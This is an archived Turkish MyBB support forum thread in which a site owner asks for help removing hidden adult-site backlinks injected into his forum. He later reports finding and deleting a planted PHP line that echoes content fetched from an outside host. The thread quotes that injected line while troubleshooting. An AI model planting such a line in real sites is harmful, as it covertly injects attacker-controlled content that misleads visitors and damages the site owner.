MyBB Depo Forum

Orjinalini görmek için tıklayınız: Siteme hacklink koymuşlar
Şu anda (Arşiv) modunu görüntülemektesiniz. Orjinal Sürümü Görüntüle internal link
Sayfalar: 1 2
Siteme hacklink tarzı bir şey atmışlar heralde yeni farkettim ama kaldırmayı bulamadım. 

sitemin kaynak kodlarına bakarsanız <!-- end: index --> 'den sonra <div style="display:yes">...</div> ile başlayan kısmı genişlettiğinizde görebilirsiniz. Adult site backlinkleri dolu. index ve footer şablonlarına baktım öyle bir şey bulamadım. index şablonu bittikten sonra geliyor bu kodlar . Yardımnlarınızı bekliyorum. 

site: forum.smiteturkiye.net

index kodlarının son kısmı:

Edit: S.G => linklerde +18 adresler yer aldığı için kaldırılmıştır.
Merhaba

Forumda birisine adminlik veya forum ile ilgili bir işinizi yaptırmak için herhangi bir ftp yetkisi vs. verdiniz mi yoksa birden bire kendiliğinden mi ortaya çıktı ?
forumu ilk kurduğumuz zamanlarda böyle bir şey yoktu, birisine adminlik vs. verdim ama zaten ondan önce de varmdı bu
Admin kayıtlarına bakın. Şablonlarda herhangi bir düzenleme yapılmış mı diye.
(22-03-2015, Saat:23:16)1st4n6uL Adlı Kullanıcıdan Alıntı: [ -> ]Admin kayıtlarına bakın. Şablonlarda herhangi bir düzenleme yapılmış mı diye.

baktım ama yok, yapılmamış
buldum sorunu, mybb şablonlarından görünmüyor ama hosting'den baktım index şablonunun sonuna 
Kod:
echo file_get_contents('http://biyik.net/a.txt');

bu kodu eklemişler
Sağ Ok :
(23-03-2015, Saat:02:51)imparator Adlı Kullanıcıdan Alıntı: [ -> ]Hocam forumda fazla bişey yok zaten herşeyi sil birdaha kur en iyisi.

yok hocam zaten sorunu buldum sildim o kodu ortadan kalktı Gülümseme
Sayfalar: 1 2